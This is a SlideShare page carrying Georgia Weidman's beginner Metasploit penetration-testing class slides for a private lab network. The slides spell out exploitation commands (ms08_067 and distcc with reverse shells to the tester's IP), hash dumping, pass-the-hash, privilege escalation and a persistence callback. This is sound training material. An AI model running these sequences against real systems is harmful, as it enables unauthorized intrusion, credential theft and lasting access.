SlideShare uma empresa Scribd logo

Metasploit for Penetration Testing: Beginner Class

Georgia Weidman
Georgia Weidman

Slides for the beginning Metasploit class.

Tecnologia
1 de 43
Baixar para ler offline
Penetration Testing with Metasploit Georgia Weidman
Acknowledgements • Metasploit Team • Offensive Security/Metasploit Unleashed • Hackers for Charity • David Kennedy • BSides Delaware Crew • Darren
Agenda • Metasploit Basics – Some terminology/brief intro to pentesting – How Metasploit works – Interacting with Metasploit • Basic Exploitation – Exploiting a vulnerability using Metasploit console • Using Meterpreter – Using the Meterpreter shell for post exploitation
Agenda • Metasploit in a penetration test – Information Gathering – Vulnerability Scanning – Exploitation in depth – Post exploitation – Reporting • Hack some stuff – Pop my boxes
Connecting Wireless access point SSID IgnatiusRiley Password: metasploit
What’s in the lab? • Windows XP SP2 – IP address: 192.168.20.22 • Ubuntu Linux 8.04 (Metasploitable) – IP address: 192.168.20.23 Others below .100 (.100 and above are you guys)
What is Penetration Testing? Simulation of a real attack Get out of jail free card for exploiting systems Report to customers with findings and recommendations Find and remediate vulnerabilities before attackers exploit them
What is Metasploit? Exploitation framework Ruby based Modular Exploits, payloads, auxiliaries, and more
Metasploit Terminology Exploit: vector for penetrating the system Payload: shellcode, what you want the exploit to do Encoders: encode or mangle payload Auxiliary: other modules besides exploitation Session: connection from a successful exploit
Metasploit Interfaces Msfconsole Msfcli Msfweb, Msfgui (discontinued) Metasploit Pro, Metasploit Express Armitage
Exploitation Streamlining • Traditional Pentest: – Find public exploit – Change offsets and return address for your target – Replace shellcode • Metasploit: – Load Metasploit module – Select target OS – Set IP addresses – Select payload
Using Msfconsole: Exploitation use <module> - sets exploit/auxillary/etc. to use set <x X> - set a parameter setg <x X> - set a parameter globally show <x> - lists all available x exploit – runs the selected module
Windows Exploitation Example search windows/smb info windows/smb/ms08_067_netapi use windows/smb/ms08_067_netapi show payloads set payload windows/meterpreter/reverse_tcp show options set lhost 192.168.20.22 (set other options as well) exploit
MSFcli Exploitation Example ./msfcli <exploit> <option=x> E Example: msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.2 LHOST=192.168.1.3 PAYLOAD=windows/shell/bind_tcp E E = exploit O = show options P = show payloads
Linux Exploitation Example search distcc use unix/misc/distcc_exec show payloads set payload cmd/unix/reverse show options set rhost 192.168.20.23 set lhost 192.168.20.102 (your ip) exploit
Sessions sessions -l lists all active sessions Sessions –i <id> interact with a given session
Meterpreter Gain a session using a meterpreter payload Memory based/never hits the disk Everything a shell can do plus extra
Meterpreter Commands help – shows all available commands background – backgrounds the session ps – shows all processes migrate <process id>– moves meterpreter to another process getuid – shows the user
Meterpreter Commands download <file> - pulls a file from the victim upload <file on attacker> <file on victim> - pushes a file to the victim hashdump – dumps the hashes from the sam shell – drops you in a shell
Exercise In Msfconsole use ms08_067_netapi to get a reverse meterpreter shell on the Windows XP machine. Experiment with different payloads and meterpreter commands.
Information Gathering Learning as much about a target as possible Examples: open ports, running services, installed software Identify points for further exploration
Metasploit and Databases Metasploit supports MySQL and PostgreSQL /etc/init.d/postgresql-8.4 start (starts PostgeSQL) msf > db_connect postgres:password@127.0.0.1/metasploit (connects to database server and creates database metasploit)
Portscanning Queries a host to see if a program is listening Ex: Browsing to a website – webserver listens on port 80 Listening ports are accessible by an attacker and if vulnerable may be used for exploitation Ex: ms08_067_netapi exploits smb on port 445
Metasploit and nmap Port scanning and just about everything else http://nmap.org/ man nmap Ex: nmap -sV 192.168.20.20-99 -oA subnet1 (TCP version scan, all hosts 192.168.20.X, outputs multiple formats beginning with subnet1) msf > db_import subnet1.xml
MSF Axillary Portscanners msf > search portscan (shows portscan modules) scanner/portscan/tcp (runs a TCP syn scan) Use auxiliary modules like exploits (use, set, exploit, etc.)
Some Other MSF Scanners scanner/smb/smb_version (scans port 445 for the smb version, good way to get OS version) scanner/ssh/ssh_version (queries the ssh version) scanner/ftp/anonymous (anonymous ftp login)
Vulnerability Scanning Query systems for potential vulnerabilities Identify potential methods of penetration Ex: SMB version scan in information gathering returned port 445 open and target Windows XP SP2, scan for ms08_067_netapi vulnerability
Metasploit and Nessus Tenable's Vulnerability Scanner (http://www.nessus.org) msf>load nessus msf > nessus_connect student1:password@192.168.20.103 ok (ok says no ssl is ok) msf > nessus_policy_list msf > nessus_scan_new -4 pwnage <ip range> (scan using policy one, name it pwnage) msf> nessus_report_list msf> nessus_report_get <report id>
Metasploit Vulnerability Scanners SMB Login Given a set of credentials what systems can they access? scanner/smb/smb_login Open VNC and X11 If misconfigured may be accessible without credentials scanner/vnc/vnc_none_auth scanner/x11/open_x11
Using Msfconsole: Exploitation use <module> - sets exploit/auxillary/etc. to use set <x X> - set a parameter setg <x X> - set a parameter globally show <x> - lists all available x exploit – runs the selected module
Our Database hosts services vulns -c select columns -s search for specific string
db_autopwn By default just runs all the exploits that match a given open port Not stealthy Using vulnerability data can be made smarter, matches vulnerabilities instead of ports db_autopwn -x -e
Attacking MSSQL MSSQL TCP port can change, UDP port is 1434 msf> search mssql (shows all mssql modules) msf> use scanner/mssql/mssql_ping (queries UDP 1434 for information including TCP port) msf> use scanner/mssql/mssql_login (tries passwords to log into mssql) msf> use windows/mssql/mssql_payload (logs into mssql and gets a shell
We have a shell, now what? Privilege escalation Local information gathering Exploiting additional hosts Maintaining access Forensic avoidance
Meterpreter: Privilege Escalation A session has the privileges of the exploited process getuid (tells you what user your session is running as) getsystem (tries various techniques to escalate privileges)
Meterpreter: Enabling Remote Desktop Turn on remote desktop, get it through the firewall, put a user in the remote desktop users group run getgui –e
Meterpreter: Migrating If the process that hosts meterpreter closes meterpreter dies too Example: client side exploit residing in the browser meterpreter> ps (shows all processes) meterpreter> migrate <process id> (moves to a new process)
Meterpreter: Searching for Content Look for specific interesting files on the exploited system search -h Example: search -f *.jpg (finds all the porn)
Pivoting Scenario: Exploit a dual networked host, with a routeable interface and non routable one. Can we attack other hosts on the non routeable interface without SSH tunneling? Route add 10.0.0.0/24 1 (routes traffic to the subnet through session 1) Now you can portscan, exploit, etc. the non routable subnet
PSExec hashdump (dumps the hashes, not always easy to crack) Why not just pass the hash to other systems? use windows/smb/psexec set SMBPass to the hash
Meterpreter: Persistence Persistence script installs a meterpreter service Meterpreter comes back when the box restarts Ex: run persistence -U -i 5 -p 443 –r 192.168.20.101 (respawns on login, at a 5 second interval on port 443 to ip 192.168.20.101)
Exercises Perform a penetration test on the Windows and Linux systems we used in class Perform a penetration test on the lab network
Contact Georgia Weidman Website: http://www.grmn00bs.com http://www.georgiaweidman.com Email: georgia@grmn00bs.com Twitter: @vincentkadmon

Recomendados

Metasploit framework in Network Security
Metasploit framework in Network SecurityMetasploit framework in Network Security
Metasploit framework in Network Security
Ashok Reddy Medikonda
 
Metasploit
MetasploitMetasploit
Metasploit
Lalith Sai
 
Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framwork
Deepanshu Gajbhiye
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For Beginners
Ramnath Shenoy
 
Metasploit
MetasploitMetasploit
Metasploit
Institute of Information Security (IIS)
 
Metaploit
MetaploitMetaploit
Metaploit
Ajinkya Pathak
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
Amit Tyagi
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenom
Siddharth Krishna Kumar
 

Recomendados

Metasploit framework in Network Security
Metasploit framework in Network SecurityMetasploit framework in Network Security
Metasploit framework in Network Security
Ashok Reddy Medikonda
 
Metasploit
MetasploitMetasploit
Metasploit
Lalith Sai
 
Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framwork
Deepanshu Gajbhiye
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For Beginners
Ramnath Shenoy
 
Metasploit
MetasploitMetasploit
Metasploit
Institute of Information Security (IIS)
 
Metaploit
MetaploitMetaploit
Metaploit
Ajinkya Pathak
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
Amit Tyagi
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenom
Siddharth Krishna Kumar
 
Introduction to Metasploit
Introduction to MetasploitIntroduction to Metasploit
Introduction to Metasploit
GTU
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing Basics
Rick Wanner
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploit
devilback
 
Directory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksDirectory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion Attacks
Raghav Bisht
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) security
Nahidul Kibria
 
Metasploit
MetasploitMetasploit
Metasploit
henelpj
 
Introduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitIntroduction To Exploitation & Metasploit
Introduction To Exploitation & Metasploit
Raghav Bisht
 
Introduction to Metasploit
Introduction to MetasploitIntroduction to Metasploit
Introduction to Metasploit
Hossein Yavari
 
Pen-Testing with Metasploit
Pen-Testing with MetasploitPen-Testing with Metasploit
Pen-Testing with Metasploit
Mohammed Danish Amber
 
Ethical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainEthical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jain
Suvrat Jain
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
Niyas Nazar
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
itmind4u
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
DARSHANBHAVSAR14
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
Prakashchand Suthar
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request Forgery
Daniel Miessler
 
Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrf
n|u - The Open Security Community
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
Anurag Srivastava
 
Web application security
Web application securityWeb application security
Web application security
Kapil Sharma
 
Security testing
Security testingSecurity testing
Security testing
Khizra Sammad
 
Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing
Priyanka Aash
 
Metasploit
MetasploitMetasploit
Metasploit
ninguna
 
Metasploit
MetasploitMetasploit
Metasploit
Raghunath G
 

Mais conteúdo relacionado

Mais procurados

Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploit
devilback
 

Mais procurados (20)

Introduction to Metasploit
Introduction to MetasploitIntroduction to Metasploit
Introduction to Metasploit
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing Basics
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploit
 
Directory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksDirectory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion Attacks
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) security
 
Metasploit
MetasploitMetasploit
Metasploit
 
Introduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitIntroduction To Exploitation & Metasploit
Introduction To Exploitation & Metasploit
 
Introduction to Metasploit
Introduction to MetasploitIntroduction to Metasploit
Introduction to Metasploit
 
Pen-Testing with Metasploit
Pen-Testing with MetasploitPen-Testing with Metasploit
Pen-Testing with Metasploit
 
Ethical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainEthical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jain
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request Forgery
 
Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrf
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
 
Web application security
Web application securityWeb application security
Web application security
 
Security testing
Security testingSecurity testing
Security testing
 
Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing
 

Destaque

Bypassing the Android Permission Model
Bypassing the Android Permission ModelBypassing the Android Permission Model
Bypassing the Android Permission Model
Georgia Weidman
 
BSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerBSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama Elhamer
Shellmates
 
Alphorm.com Support de la formation Hacking et Sécurité Metasploit
Alphorm.com Support de la formation Hacking et Sécurité MetasploitAlphorm.com Support de la formation Hacking et Sécurité Metasploit
Alphorm.com Support de la formation Hacking et Sécurité Metasploit
Alphorm
 
Diarrhea:Myths and facts, Precaution
Diarrhea:Myths and facts, Precaution Diarrhea:Myths and facts, Precaution
Diarrhea:Myths and facts, Precaution
Wuzna Haroon
 
Alta White Paper D2C eCommerce Case Study 2016
Alta White Paper D2C eCommerce Case Study 2016Alta White Paper D2C eCommerce Case Study 2016
Alta White Paper D2C eCommerce Case Study 2016
Patrick Nicholson
 

Destaque (19)

Metasploit
MetasploitMetasploit
Metasploit
 
Metasploit
MetasploitMetasploit
Metasploit
 
Basic Metasploit
Basic MetasploitBasic Metasploit
Basic Metasploit
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with Metasploit
 
Metasploit Basics
Metasploit BasicsMetasploit Basics
Metasploit Basics
 
Bypassing the Android Permission Model
Bypassing the Android Permission ModelBypassing the Android Permission Model
Bypassing the Android Permission Model
 
Metasploit Humla for Beginner
Metasploit Humla for BeginnerMetasploit Humla for Beginner
Metasploit Humla for Beginner
 
Ethical Hacking & Penetration Testing
Ethical Hacking & Penetration TestingEthical Hacking & Penetration Testing
Ethical Hacking & Penetration Testing
 
BSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerBSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama Elhamer
 
Why Data Virtualization? An Introduction by Denodo
Why Data Virtualization? An Introduction by DenodoWhy Data Virtualization? An Introduction by Denodo
Why Data Virtualization? An Introduction by Denodo
 
Big Data Analytics with Hadoop
Big Data Analytics with HadoopBig Data Analytics with Hadoop
Big Data Analytics with Hadoop
 
Big data ppt
Big data pptBig data ppt
Big data ppt
 
Alphorm.com Support de la formation Hacking et Sécurité Metasploit
Alphorm.com Support de la formation Hacking et Sécurité MetasploitAlphorm.com Support de la formation Hacking et Sécurité Metasploit
Alphorm.com Support de la formation Hacking et Sécurité Metasploit
 
mpx Replay, Expedite Your Catch-Up and C3 Workflow 2 of 2
mpx Replay, Expedite Your Catch-Up and C3 Workflow 2 of 2mpx Replay, Expedite Your Catch-Up and C3 Workflow 2 of 2
mpx Replay, Expedite Your Catch-Up and C3 Workflow 2 of 2
 
"15 Business Story Ideas to Jump on Now"
"15 Business Story Ideas to Jump on Now""15 Business Story Ideas to Jump on Now"
"15 Business Story Ideas to Jump on Now"
 
Diarrhea:Myths and facts, Precaution
Diarrhea:Myths and facts, Precaution Diarrhea:Myths and facts, Precaution
Diarrhea:Myths and facts, Precaution
 
Alta White Paper D2C eCommerce Case Study 2016
Alta White Paper D2C eCommerce Case Study 2016Alta White Paper D2C eCommerce Case Study 2016
Alta White Paper D2C eCommerce Case Study 2016
 
cathy resume
cathy resumecathy resume
cathy resume
 
Basics of Coding in Pediatrics Medical Billing
Basics of Coding in Pediatrics Medical BillingBasics of Coding in Pediatrics Medical Billing
Basics of Coding in Pediatrics Medical Billing
 

Semelhante a Metasploit for Penetration Testing: Beginner Class

Client side exploits
Client side exploitsClient side exploits
Client side exploits
nickyt8
 
metaploit framework
metaploit frameworkmetaploit framework
metaploit framework
Le Quyen
 
24 33 -_metasploit
24 33 -_metasploit24 33 -_metasploit
24 33 -_metasploit
wozgeass
 
SSH for pen-testers
SSH for pen-testersSSH for pen-testers
SSH for pen-testers
E D Williams
 

Semelhante a Metasploit for Penetration Testing: Beginner Class (20)

Laboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testing
 
Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and Ponies
 
Cheatsheet: Metasploit
Cheatsheet: MetasploitCheatsheet: Metasploit
Cheatsheet: Metasploit
 
Backtrack Manual Part6
Backtrack Manual Part6Backtrack Manual Part6
Backtrack Manual Part6
 
Client side exploits
Client side exploitsClient side exploits
Client side exploits
 
Hacking 101
Hacking 101Hacking 101
Hacking 101
 
Penetration Testing Boot CAMP
Penetration Testing Boot CAMPPenetration Testing Boot CAMP
Penetration Testing Boot CAMP
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminar
 
Server hardening
Server hardeningServer hardening
Server hardening
 
Inside Out Hacking - Bypassing Firewall
Inside Out Hacking - Bypassing FirewallInside Out Hacking - Bypassing Firewall
Inside Out Hacking - Bypassing Firewall
 
Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web Workshop
 
Pentesting with linux
Pentesting with linuxPentesting with linux
Pentesting with linux
 
metaploit framework
metaploit frameworkmetaploit framework
metaploit framework
 
Wissbi osdc pdf
Wissbi osdc pdfWissbi osdc pdf
Wissbi osdc pdf
 
24 33 -_metasploit
24 33 -_metasploit24 33 -_metasploit
24 33 -_metasploit
 
Backtrack Manual Part7
Backtrack Manual Part7Backtrack Manual Part7
Backtrack Manual Part7
 
SSH for pen-testers
SSH for pen-testersSSH for pen-testers
SSH for pen-testers
 
iCrOSS 2013_Pentest
iCrOSS 2013_PentestiCrOSS 2013_Pentest
iCrOSS 2013_Pentest
 
Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004
 
Threats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxThreats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in Linux
 

Último

Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
UK Journal
 

Último (20)

Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Evaluating the top large language models.pdf
Evaluating the top large language models.pdfEvaluating the top large language models.pdf
Evaluating the top large language models.pdf
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 

Metasploit for Penetration Testing: Beginner Class

  • 1. Penetration Testing with Metasploit Georgia Weidman
  • 2. Acknowledgements • Metasploit Team • Offensive Security/Metasploit Unleashed • Hackers for Charity • David Kennedy • BSides Delaware Crew • Darren
  • 3. Agenda • Metasploit Basics – Some terminology/brief intro to pentesting – How Metasploit works – Interacting with Metasploit • Basic Exploitation – Exploiting a vulnerability using Metasploit console • Using Meterpreter – Using the Meterpreter shell for post exploitation
  • 4. Agenda • Metasploit in a penetration test – Information Gathering – Vulnerability Scanning – Exploitation in depth – Post exploitation – Reporting • Hack some stuff – Pop my boxes
  • 5. Connecting Wireless access point SSID IgnatiusRiley Password: metasploit
  • 6. What’s in the lab? • Windows XP SP2 – IP address: 192.168.20.22 • Ubuntu Linux 8.04 (Metasploitable) – IP address: 192.168.20.23 Others below .100 (.100 and above are you guys)
  • 7. What is Penetration Testing? Simulation of a real attack Get out of jail free card for exploiting systems Report to customers with findings and recommendations Find and remediate vulnerabilities before attackers exploit them
  • 8. What is Metasploit? Exploitation framework Ruby based Modular Exploits, payloads, auxiliaries, and more
  • 9. Metasploit Terminology Exploit: vector for penetrating the system Payload: shellcode, what you want the exploit to do Encoders: encode or mangle payload Auxiliary: other modules besides exploitation Session: connection from a successful exploit
  • 10. Metasploit Interfaces Msfconsole Msfcli Msfweb, Msfgui (discontinued) Metasploit Pro, Metasploit Express Armitage
  • 11. Exploitation Streamlining • Traditional Pentest: – Find public exploit – Change offsets and return address for your target – Replace shellcode • Metasploit: – Load Metasploit module – Select target OS – Set IP addresses – Select payload
  • 12. Using Msfconsole: Exploitation use <module> - sets exploit/auxillary/etc. to use set <x X> - set a parameter setg <x X> - set a parameter globally show <x> - lists all available x exploit – runs the selected module
  • 13. Windows Exploitation Example search windows/smb info windows/smb/ms08_067_netapi use windows/smb/ms08_067_netapi show payloads set payload windows/meterpreter/reverse_tcp show options set lhost 192.168.20.22 (set other options as well) exploit
  • 14. MSFcli Exploitation Example ./msfcli <exploit> <option=x> E Example: msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.2 LHOST=192.168.1.3 PAYLOAD=windows/shell/bind_tcp E E = exploit O = show options P = show payloads
  • 15. Linux Exploitation Example search distcc use unix/misc/distcc_exec show payloads set payload cmd/unix/reverse show options set rhost 192.168.20.23 set lhost 192.168.20.102 (your ip) exploit
  • 16. Sessions sessions -l lists all active sessions Sessions –i <id> interact with a given session
  • 17. Meterpreter Gain a session using a meterpreter payload Memory based/never hits the disk Everything a shell can do plus extra
  • 18. Meterpreter Commands help – shows all available commands background – backgrounds the session ps – shows all processes migrate <process id>– moves meterpreter to another process getuid – shows the user
  • 19. Meterpreter Commands download <file> - pulls a file from the victim upload <file on attacker> <file on victim> - pushes a file to the victim hashdump – dumps the hashes from the sam shell – drops you in a shell
  • 20. Exercise In Msfconsole use ms08_067_netapi to get a reverse meterpreter shell on the Windows XP machine. Experiment with different payloads and meterpreter commands.
  • 21. Information Gathering Learning as much about a target as possible Examples: open ports, running services, installed software Identify points for further exploration
  • 22. Metasploit and Databases Metasploit supports MySQL and PostgreSQL /etc/init.d/postgresql-8.4 start (starts PostgeSQL) msf > db_connect postgres:password@127.0.0.1/metasploit (connects to database server and creates database metasploit)
  • 23. Portscanning Queries a host to see if a program is listening Ex: Browsing to a website – webserver listens on port 80 Listening ports are accessible by an attacker and if vulnerable may be used for exploitation Ex: ms08_067_netapi exploits smb on port 445
  • 24. Metasploit and nmap Port scanning and just about everything else http://nmap.org/ man nmap Ex: nmap -sV 192.168.20.20-99 -oA subnet1 (TCP version scan, all hosts 192.168.20.X, outputs multiple formats beginning with subnet1) msf > db_import subnet1.xml
  • 25. MSF Axillary Portscanners msf > search portscan (shows portscan modules) scanner/portscan/tcp (runs a TCP syn scan) Use auxiliary modules like exploits (use, set, exploit, etc.)
  • 26. Some Other MSF Scanners scanner/smb/smb_version (scans port 445 for the smb version, good way to get OS version) scanner/ssh/ssh_version (queries the ssh version) scanner/ftp/anonymous (anonymous ftp login)
  • 27. Vulnerability Scanning Query systems for potential vulnerabilities Identify potential methods of penetration Ex: SMB version scan in information gathering returned port 445 open and target Windows XP SP2, scan for ms08_067_netapi vulnerability
  • 28. Metasploit and Nessus Tenable's Vulnerability Scanner (http://www.nessus.org) msf>load nessus msf > nessus_connect student1:password@192.168.20.103 ok (ok says no ssl is ok) msf > nessus_policy_list msf > nessus_scan_new -4 pwnage <ip range> (scan using policy one, name it pwnage) msf> nessus_report_list msf> nessus_report_get <report id>
  • 29. Metasploit Vulnerability Scanners SMB Login Given a set of credentials what systems can they access? scanner/smb/smb_login Open VNC and X11 If misconfigured may be accessible without credentials scanner/vnc/vnc_none_auth scanner/x11/open_x11
  • 30. Using Msfconsole: Exploitation use <module> - sets exploit/auxillary/etc. to use set <x X> - set a parameter setg <x X> - set a parameter globally show <x> - lists all available x exploit – runs the selected module
  • 31. Our Database hosts services vulns -c select columns -s search for specific string
  • 32. db_autopwn By default just runs all the exploits that match a given open port Not stealthy Using vulnerability data can be made smarter, matches vulnerabilities instead of ports db_autopwn -x -e
  • 33. Attacking MSSQL MSSQL TCP port can change, UDP port is 1434 msf> search mssql (shows all mssql modules) msf> use scanner/mssql/mssql_ping (queries UDP 1434 for information including TCP port) msf> use scanner/mssql/mssql_login (tries passwords to log into mssql) msf> use windows/mssql/mssql_payload (logs into mssql and gets a shell
  • 34. We have a shell, now what? Privilege escalation Local information gathering Exploiting additional hosts Maintaining access Forensic avoidance
  • 35. Meterpreter: Privilege Escalation A session has the privileges of the exploited process getuid (tells you what user your session is running as) getsystem (tries various techniques to escalate privileges)
  • 36. Meterpreter: Enabling Remote Desktop Turn on remote desktop, get it through the firewall, put a user in the remote desktop users group run getgui –e
  • 37. Meterpreter: Migrating If the process that hosts meterpreter closes meterpreter dies too Example: client side exploit residing in the browser meterpreter> ps (shows all processes) meterpreter> migrate <process id> (moves to a new process)
  • 38. Meterpreter: Searching for Content Look for specific interesting files on the exploited system search -h Example: search -f *.jpg (finds all the porn)
